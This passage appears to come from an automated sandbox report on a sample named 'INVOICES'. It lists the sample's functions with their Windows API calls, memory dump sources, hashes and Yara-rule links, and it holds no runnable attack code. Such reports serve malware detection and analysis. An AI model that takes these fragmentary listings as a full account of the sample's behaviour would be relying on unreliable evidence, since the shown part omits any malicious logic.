                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007B75E4
                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007B75F0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                  • Opcode ID: e0552514cc41cd9e0ef027b94dee100e2939d31b44beed1f956ac32d213e2f8a
                                                                                                                                  • Instruction ID: da43c2f68469d2fc8908e1a5c32fbe5690b465ab05e092ed64c5bc84b3a99853
                                                                                                                                  • Opcode Fuzzy Hash: e0552514cc41cd9e0ef027b94dee100e2939d31b44beed1f956ac32d213e2f8a
                                                                                                                                  • Instruction Fuzzy Hash: 4C316D71104119BBDF269F68DC08FEA3B69FF49720F114325FA15A61A0C739E821DB64
                                                                                                                                  Function 00756F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00756FBB
                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00757054
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 0075708A
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 007570A7
                                                                                                                                  • __allrem.LIBCMT ref: 007570FD
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00757119
                                                                                                                                  • __allrem.LIBCMT ref: 00757130
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0075714E
                                                                                                                                  • __allrem.LIBCMT ref: 00757165
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00757183
                                                                                                                                  • __invoke_watson.LIBCMT ref: 007571F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                  • Instruction ID: f831bc02b25e099952f868163b6f86eb376b0ba63376a1280f2ff2efae2ed5db
                                                                                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                  • Instruction Fuzzy Hash: FB710771A00B16EBE7189E39DC46BDAB3A8AF51325F14422AFC15D72C1EBB8D904C7D0
                                                                                                                                  Function 0079281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0079283A
                                                                                                                                  • GetMenuItemInfoW.USER32(007F5890,000000FF,00000000,00000030), ref: 0079289B
                                                                                                                                  • SetMenuItemInfoW.USER32(007F5890,00000004,00000000,00000030), ref: 007928D1
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 007928E3
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00792927
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00792943
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0079296D
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 007929B2
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007929F8
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00792A0C
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00792A2D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                  • Opcode ID: 5cd3fcee4f484909c46db333e9fcada95ee8ca2d9abbdbc45b9761036a581ba7
                                                                                                                                  • Instruction ID: 2af3320fac1fa6fe13b98de2b096295316954b738b06933b2429a678a9d4956e
                                                                                                                                  • Opcode Fuzzy Hash: 5cd3fcee4f484909c46db333e9fcada95ee8ca2d9abbdbc45b9761036a581ba7
                                                                                                                                  • Instruction Fuzzy Hash: C661A1B1900249BFDF21EF64EC88EBE7BB8FB05314F144159E842A7252D739AD06DB20
                                                                                                                                  Function 007B6F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007B6FD7
                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007B6FDA
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007B6FFE
                                                                                                                                  • _memset.LIBCMT ref: 007B700F
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007B7021
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007B7099
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                  • Opcode ID: 93efaf815f82ae341a299d99736e2de9ffcaec09f29b79256dd55a8bcb01341f
                                                                                                                                  • Instruction ID: 5111ae54e13fb408234cc1154925b497d1bb6631f83c72417e898d70a7dfccb6
                                                                                                                                  • Opcode Fuzzy Hash: 93efaf815f82ae341a299d99736e2de9ffcaec09f29b79256dd55a8bcb01341f
                                                                                                                                  • Instruction Fuzzy Hash: C7616975A00208EFDB10DFA8CC85FEE77B8EB49710F10415AFA15AB2A1D778AD41DB64
                                                                                                                                  Function 00786EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00786F15
                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00786F6E
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00786F80
                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00786FA0
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00786FF3
                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00787007
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0078701C
                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00787029
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00787032
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00787044
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0078704F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                  • Opcode ID: 8eb846afda94478975826a0a10d12a7ecd18d45cb674c8f37d5ec88dc530dac9
                                                                                                                                  • Instruction ID: c4c5f2edf3830e0cfe8869c7f541066e99e03ccece090fe575cf01816da045a6
                                                                                                                                  • Opcode Fuzzy Hash: 8eb846afda94478975826a0a10d12a7ecd18d45cb674c8f37d5ec88dc530dac9
                                                                                                                                  • Instruction Fuzzy Hash: 11414F35900219EFCB04EF64DC48EAEBBB9EF48714F108169E956E7261CB78E945CB90
                                                                                                                                  Function 007A84D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • CoInitialize.OLE32 ref: 007A8518
                                                                                                                                  • CoUninitialize.COMBASE ref: 007A8523
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,007C2BEC,?), ref: 007A8583
                                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 007A85F6
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007A8690
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007A86F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                  • Opcode ID: 12e0cb7a3008ca26831b5c59ab39e347ea8a3bd4d32f48c3c27d63a7f78c9614
                                                                                                                                  • Instruction ID: 343bd68f2a21bcff5602c4d9ce34b084af6cc91ec9476f77957ce85fa922e20d
                                                                                                                                  • Opcode Fuzzy Hash: 12e0cb7a3008ca26831b5c59ab39e347ea8a3bd4d32f48c3c27d63a7f78c9614
                                                                                                                                  • Instruction Fuzzy Hash: 21618E70608301EFD750DF24C849F5ABBE8AF8A714F144A19F9859B292DB78ED44CB93
                                                                                                                                  Function 007A5848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 007A58A9
                                                                                                                                  • inet_addr.WS2_32(?), ref: 007A58EE
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 007A58FA
                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 007A5908
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007A5978
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007A598E
                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007A5A03
                                                                                                                                  • WSACleanup.WS2_32 ref: 007A5A09
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                  • String ID: Ping
                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                  • Opcode ID: ba550d49bce4f6f6b3c16be20284b05e1b824463655b80c58a08b4355b87f941
                                                                                                                                  • Instruction ID: d1a59ae76e2bc7a70829a919fef1ad5056d42cf0f0b23021de3d0633d664f7e6
                                                                                                                                  • Opcode Fuzzy Hash: ba550d49bce4f6f6b3c16be20284b05e1b824463655b80c58a08b4355b87f941
                                                                                                                                  • Instruction Fuzzy Hash: 66516331604700EFD710AF24CC49B2A77E4EF89720F148669F995DB2A1DB78ED04DB55
                                                                                                                                  Function 0079B54F Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0079B55C
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0079B5D2
                                                                                                                                  • GetLastError.KERNEL32 ref: 0079B5DC
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0079B649
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                  • Opcode ID: 5c0f264aae809f98f19c66f6f63c1a4b1b389952bd73783635664749449dcfd9
                                                                                                                                  • Instruction ID: d36cb43256bd878919797955e5cfc461241e19cce01b7fe952e433bef84536ae
                                                                                                                                  • Opcode Fuzzy Hash: 5c0f264aae809f98f19c66f6f63c1a4b1b389952bd73783635664749449dcfd9
                                                                                                                                  • Instruction Fuzzy Hash: A931A3B5A00209EFDB10DFA9ED89EADB7B4EF48700F144125E505DB292DB78A901C751
                                                                                                                                  Function 00789251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007892D6
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 007892E1
                                                                                                                                  • GetParent.USER32 ref: 007892FD
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00789300
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00789309
                                                                                                                                  • GetParent.USER32(?), ref: 00789325
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00789328
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                  • Opcode ID: 432e668488619246219075d32b00e0e9fd87b81c59335dbef6b596fdcfa9c31a
                                                                                                                                  • Instruction ID: 4c976f294271013c16944327f23aac0bacf8f2deb86d3318b2474608b312a4d7
                                                                                                                                  • Opcode Fuzzy Hash: 432e668488619246219075d32b00e0e9fd87b81c59335dbef6b596fdcfa9c31a
                                                                                                                                  • Instruction Fuzzy Hash: FD21C170A40204FBDF04AB65CC89EFEBB64EF59310F144256F961972E2DB7D5815DB20
                                                                                                                                  Function 0078933C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007893BF
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 007893CA
                                                                                                                                  • GetParent.USER32 ref: 007893E6
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 007893E9
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 007893F2
                                                                                                                                  • GetParent.USER32(?), ref: 0078940E
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00789411
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                  • Opcode ID: aa4fd4d065e9fb1bc41b7d71df13a29ef5a9e965ffee17053a09431daed38b6d
                                                                                                                                  • Instruction ID: 86de1c605919f670f91b8491707608ec4dd532e3cfe38dc66d054749a4b15c0a
                                                                                                                                  • Opcode Fuzzy Hash: aa4fd4d065e9fb1bc41b7d71df13a29ef5a9e965ffee17053a09431daed38b6d
                                                                                                                                  • Instruction Fuzzy Hash: 8821B374A40204FBDF04ABA5CC89EFEBB78EF59300F144166F911971A2DB7D591ADB20
                                                                                                                                  Function 00789425 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 00789431
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00789446
                                                                                                                                  • _wcscmp.LIBCMT ref: 00789458
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007894D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  • Opcode ID: 497d8e74ac60864e3942d7ec500a39dd2668e91f5f8bc845733242ac81bd5ffd
                                                                                                                                  • Instruction ID: 7aa0cac1c3d88ddef8334cba1eb9d0d05bafa8965ca8b87edd9fc6ffac570320
                                                                                                                                  • Opcode Fuzzy Hash: 497d8e74ac60864e3942d7ec500a39dd2668e91f5f8bc845733242ac81bd5ffd
                                                                                                                                  • Instruction Fuzzy Hash: FA110A76288386F9F6143624AC0BDF7739C8F05775B204126FE0CA40F2FAAE68578754
                                                                                                                                  Function 007A89C0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007A89EC
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 007A8A19
